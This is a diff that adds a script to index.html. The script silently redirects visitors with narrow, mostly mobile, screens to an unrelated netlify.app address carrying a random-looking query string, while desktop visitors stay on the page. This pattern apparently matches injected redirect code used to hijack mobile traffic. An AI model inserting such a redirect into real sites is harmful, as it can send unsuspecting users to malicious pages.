--- a/index.html
+++ b/index.html
@@ -1,1 +1,8 @@
 
+ <script type="text/javascript">
+        if (screen.width <= 1080) {
+        window.location = "https://condescending-leakey-1d3f60.netlify.app/?zxgfhgfhtrsfffdsugfgf";
+    } else {
+
+    }
+</script>
